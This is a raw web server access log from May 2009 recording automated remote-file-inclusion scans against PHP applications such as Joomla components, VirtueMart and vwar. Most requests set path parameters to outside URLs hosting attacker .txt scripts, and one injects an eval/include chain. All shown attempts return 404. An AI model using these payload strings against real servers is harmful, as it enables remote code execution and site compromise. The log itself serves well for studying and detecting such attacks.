82.151.132.176 - - [17/May/2009:14:25:42 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
82.151.132.176 - - [17/May/2009:14:25:42 -0500] "GET /logs/access_log.1239753600//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.151.132.176 - - [17/May/2009:14:25:42 -0500] "GET /logs/access_log.1234828800//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
82.151.132.176 - - [17/May/2009:14:25:42 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:14:27:11 -0500] "GET /logs/access_log.1235347200/errors.php?error=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:14:27:11 -0500] "GET /logs/errors.php?error=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:14:27:11 -0500] "GET /errors.php?error=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:14:27:16 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:14:27:16 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:14:27:21 -0500] "GET /logs/access_log.1240358400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:14:28:36 -0500] "GET /logs/access_log.1235347200//index.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:14:28:36 -0500] "GET //index.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:14:28:36 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.107.138.34 - - [17/May/2009:14:31:33 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
200.107.138.34 - - [17/May/2009:14:31:34 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
122.153.212.195 - - [17/May/2009:14:31:56 -0500] "GET ////components/com_virtuemart/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:14:32:01 -0500] "GET /logs////components/com_virtuemart/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:14:32:06 -0500] "GET /logs/access_log.1239408000////components/com_virtuemart/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:14:32:06 -0500] "GET /logs/access_log.1240185600////components/com_virtuemart/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:14:32:57 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:32:59 -0500] "GET /logs/access_log.1227916800//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
60.251.217.4 - - [17/May/2009:14:33:32 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:14:33:32 -0500] "GET /logs/access_log.1240358400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:14:33:32 -0500] "GET /logs/access_log.1239926400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
60.251.217.4 - - [17/May/2009:14:33:37 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.buldir.com/regions/fx29id2.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:14:33:51 -0500] "GET /logs/access_log.1227916800//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:33:51 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:33:57 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:33:57 -0500] "GET /logs/access_log.1226966400//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
200.107.138.34 - - [17/May/2009:14:34:07 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
200.107.138.34 - - [17/May/2009:14:34:07 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:34:50 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:34:50 -0500] "GET /logs/access_log.1226966400//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:35:17 -0500] "GET /logs/access_log.1225843200//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:36:26 -0500] "GET /logs/access_log.1225843200//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
91.206.183.148 - - [17/May/2009:14:38:49 -0500] "GET /config.php?path_to_root=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
91.206.183.148 - - [17/May/2009:14:38:49 -0500] "GET /logs/config.php?path_to_root=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
91.206.183.148 - - [17/May/2009:14:38:49 -0500] "GET /logs/access_log.1238889600/config.php?path_to_root=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:14:38:49 -0500] "GET //index.php?DOCUMENT_ROOT=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:14:38:49 -0500] "GET /logs/access_log.1235347200//index.php?DOCUMENT_ROOT=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:14:38:49 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:14:43:21 -0500] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:14:43:21 -0500] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:14:43:22 -0500] "GET /logs/access_log.1235779200//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:14:43:22 -0500] "GET /logs/access_log.1238112000//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
77.221.130.19 - - [17/May/2009:14:44:01 -0500] "GET //administrator/components/com_languages/http://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
77.221.130.19 - - [17/May/2009:14:44:01 -0500] "GET /logs//administrator/components/com_languages/http://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 366 "-""libwww-perl/5.805"
77.221.130.19 - - [17/May/2009:14:46:58 -0500] "GET /logs//administrator/components/com_users/http://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
77.221.130.19 - - [17/May/2009:14:46:58 -0500] "GET //administrator/components/com_users/http://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
201.12.149.149 - - [17/May/2009:14:48:51 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:14:48:54 -0500] "GET /logs/access_log.1226188800//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
121.165.73.157 - - [17/May/2009:14:48:56 -0500] "GET /config.php?path_to_root=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.165.73.157 - - [17/May/2009:14:48:56 -0500] "GET /logs/config.php?path_to_root=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.165.73.157 - - [17/May/2009:14:48:56 -0500] "GET /logs/access_log.1238889600/config.php?path_to_root=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
201.12.149.149 - - [17/May/2009:14:49:18 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
201.12.149.149 - - [17/May/2009:14:49:19 -0500] "GET /logs/access_log.1240444800/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
201.12.149.149 - - [17/May/2009:14:49:19 -0500] "GET /logs/access_log.1240185600/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:14:50:03 -0500] "GET /logs/access_log.1226188800//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
173.45.93.202 - - [17/May/2009:14:54:13 -0500] "GET /logs//phpyabs/moduli/libri/index.php?Azione=http://mcdisseny.com/tmp/idroot.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
173.45.93.202 - - [17/May/2009:14:54:13 -0500] "GET /logs//phpyabs/moduli/libri/index.php?Azione=http://mcdisseny.com/tmp/id.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
173.45.93.202 - - [17/May/2009:14:54:14 -0500] "GET //phpyabs/moduli/libri/index.php?Azione=http://mcdisseny.com/tmp/idroot.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
173.45.93.202 - - [17/May/2009:14:54:14 -0500] "GET //phpyabs/moduli/libri/index.php?Azione=http://mcdisseny.com/tmp/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
121.173.130.41 - - [17/May/2009:14:59:18 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:14:59:19 -0500] "GET /logs/access_log.1239926400//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:14:59:19 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:15:12:45 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:15:12:45 -0500] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:15:12:45 -0500] "GET /logs/access_log.1235865600//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:15:12:46 -0500] "GET /logs/access_log.1233705600//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.53.42.66 - - [17/May/2009:15:17:43 -0500] "GET /logs/errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
74.53.42.66 - - [17/May/2009:15:17:43 -0500] "GET /errors.php?error=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
66.249.67.180 - - [17/May/2009:15:24:11 -0500] "GET /logs/access_log.1105920000 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
221.157.225.65 - - [17/May/2009:15:24:14 -0500] "GET /logs/environment.php?DIR_PREFIX=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:15:24:14 -0500] "GET /environment.php?DIR_PREFIX=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:15:24:14 -0500] "GET /logs/access_log.1234396800/environment.php?DIR_PREFIX=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:15:24:28 -0500] "GET /logs/access_log.1234310400/environment.php?DIR_PREFIX=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:26:14 -0500] "GET /logs/access_log.1230076800//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:26:14 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:26:14 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
210.118.194.200 - - [17/May/2009:15:26:45 -0500] "GET /environment.php?DIR_PREFIX=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
210.118.194.200 - - [17/May/2009:15:26:45 -0500] "GET /logs/environment.php?DIR_PREFIX=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
210.118.194.200 - - [17/May/2009:15:26:45 -0500] "GET /logs/access_log.1234396800/environment.php?DIR_PREFIX=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
91.196.124.4 - - [17/May/2009:15:26:49 -0500] "GET /logs/db.php?path_local=http://www.joyoptics.com/images/products/iid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
91.196.124.4 - - [17/May/2009:15:26:50 -0500] "GET /db.php?path_local=http://www.joyoptics.com/images/products/iid.txt?? HTTP/1.1" 404 289 "-""libwww-perl/5.811"
58.227.193.198 - - [17/May/2009:15:26:52 -0500] "GET /logs/access_log.1231977600//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:26:52 -0500] "GET /logs/access_log.1233878400//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:26:52 -0500] "GET /logs/access_log.1232668800//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:26:57 -0500] "GET /logs/access_log.1231113600//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:04 -0500] "GET /logs/access_log.1236643200//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:04 -0500] "GET /logs/access_log.1234915200//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:04 -0500] "GET /logs/access_log.1233705600//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:17 -0500] "GET /logs/access_log.1228435200//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:17 -0500] "GET /logs/access_log.1231891200//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:17 -0500] "GET /logs/access_log.1235260800//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:17 -0500] "GET /logs/access_log.1228262400//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:24 -0500] "GET /logs/access_log.1227744000//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:24 -0500] "GET /logs/access_log.1233014400//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:36 -0500] "GET /logs/access_log.1233273600//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:36 -0500] "GET /logs/access_log.1236038400//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.118.194.200 - - [17/May/2009:15:27:37 -0500] "GET /logs/access_log.1234310400/environment.php?DIR_PREFIX=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:45 -0500] "GET /logs/access_log.1233792000//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:54 -0500] "GET /logs/access_log.1235433600//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:54 -0500] "GET /logs/access_log.1229904000//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:54 -0500] "GET /logs/access_log.1232755200//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:58 -0500] "GET /logs/access_log.1231200000//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:58 -0500] "GET /logs/access_log.1233100800//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:27:58 -0500] "GET /logs/access_log.1231804800//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:28:04 -0500] "GET /logs/access_log.1231718400//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:28:04 -0500] "GET /logs/access_log.1228694400//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:28:09 -0500] "GET /logs/access_log.1226620800//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:28:09 -0500] "GET /logs/access_log.1239580800//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:28:09 -0500] "GET /logs/access_log.1228608000//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:28:09 -0500] "GET /logs/access_log.1235174400//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:15:28:09 -0500] "GET /logs/access_log.1233532800//modules/vwar/admin/admin.php?vwar_root=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:29:28 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:29:28 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:29:28 -0500] "GET /logs/access_log.1230076800//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:29:42 -0500] "GET /logs/access_log.1231977600//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:29:42 -0500] "GET /logs/access_log.1233878400//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:29:47 -0500] "GET /logs/access_log.1232668800//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:29:50 -0500] "GET /logs/access_log.1231113600//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:29:55 -0500] "GET /logs/access_log.1234915200//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:29:55 -0500] "GET /logs/access_log.1236643200//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:05 -0500] "GET /logs/access_log.1233705600//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:12 -0500] "GET /logs/access_log.1231891200//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:12 -0500] "GET /logs/access_log.1228435200//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:12 -0500] "GET /logs/access_log.1235260800//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.94.148.39 - - [17/May/2009:15:30:13 -0500] "GET /logs/access_log.1228262400//modules/vwar/admin/admin.php?vwar_root=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
